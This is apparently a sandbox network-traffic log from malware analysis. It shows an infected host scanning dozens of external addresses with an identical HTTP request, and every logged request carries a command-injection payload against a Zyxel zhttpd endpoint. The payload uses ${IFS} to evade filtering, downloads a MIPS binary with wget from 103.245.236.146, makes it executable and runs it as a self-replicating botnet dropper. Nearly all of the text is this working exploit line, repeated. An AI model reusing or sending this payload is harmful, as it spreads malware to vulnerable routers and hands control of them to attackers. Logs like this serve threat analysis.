                                                        Jan 28, 2024 10:12:57.496190071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5667192.168.2.1440284172.243.214.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496243000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5668192.168.2.1443532135.225.35.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496294022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5669192.168.2.1433564130.236.32.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496335030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5670192.168.2.144843094.249.193.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496388912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5671192.168.2.1452876209.75.221.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496422052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5672192.168.2.1438564126.43.39.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496468067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5673192.168.2.1452002137.233.150.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496526957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5674192.168.2.1458128184.24.149.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496547937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5675192.168.2.1460540141.5.29.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496606112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5676192.168.2.1439516192.23.248.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496639013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5677192.168.2.1445838113.199.142.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496690035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5678192.168.2.1442516213.81.76.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496742010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5679192.168.2.144784087.15.217.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496768951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5680192.168.2.144139881.155.214.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496795893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5681192.168.2.1446560170.87.131.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496892929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5682192.168.2.1456898184.83.134.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496928930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5683192.168.2.145839450.52.58.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496956110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5684192.168.2.145333048.197.170.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.496992111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5685192.168.2.143447827.2.238.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497015953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5686192.168.2.1453352206.29.255.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497050047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5687192.168.2.1433256168.122.105.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497081041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5688192.168.2.143865686.70.229.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497117043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5689192.168.2.1444800191.61.203.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497147083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5690192.168.2.1460568211.197.160.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497193098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5691192.168.2.14425882.146.34.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497243881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5692192.168.2.1444486183.9.50.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497272015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5693192.168.2.145348454.157.181.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497324944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5694192.168.2.1453426194.100.78.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497356892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5695192.168.2.1450610143.212.96.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497407913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5696192.168.2.145370218.228.235.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497437000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5697192.168.2.143855497.29.109.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497472048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5698192.168.2.1433014101.111.250.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497498989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5699192.168.2.143712878.201.151.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497545958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5700192.168.2.1441678161.67.253.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497602940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5701192.168.2.1436150167.247.233.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497646093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5702192.168.2.1448886105.195.192.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497665882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5703192.168.2.1435010119.92.114.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497724056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5704192.168.2.144520040.113.216.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497791052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5705192.168.2.1456556105.73.194.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497824907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5706192.168.2.145824050.81.6.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497874975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5707192.168.2.144770449.4.246.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497916937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5708192.168.2.14431468.197.4.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497956038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5709192.168.2.1446824223.35.187.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.497997999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5710192.168.2.1457092188.157.133.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.498044014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5711192.168.2.143423075.169.75.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.498084068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5712192.168.2.145161012.140.175.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.498126984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5713192.168.2.1443378190.47.73.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.498159885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5714192.168.2.1444824199.178.252.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.498188019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5715192.168.2.1435562102.183.145.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.498234034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5716192.168.2.145102618.186.75.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.498270988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5717192.168.2.145435063.72.206.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.498296022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5718192.168.2.1450922106.18.94.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.498347998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5719192.168.2.1456882193.59.73.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.498378992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5720192.168.2.1446262165.30.70.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.498434067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5721192.168.2.144578054.140.243.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.498483896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5722192.168.2.1447554173.169.190.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.498523951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5723192.168.2.1434952167.193.33.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.498564959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5724192.168.2.1456678151.192.188.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.498631001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5725192.168.2.1435678169.144.62.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.498645067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5726192.168.2.144882237.196.172.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.501849890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5727192.168.2.144176283.7.21.3443
                                                        TimestampBytes transferredDirectionData
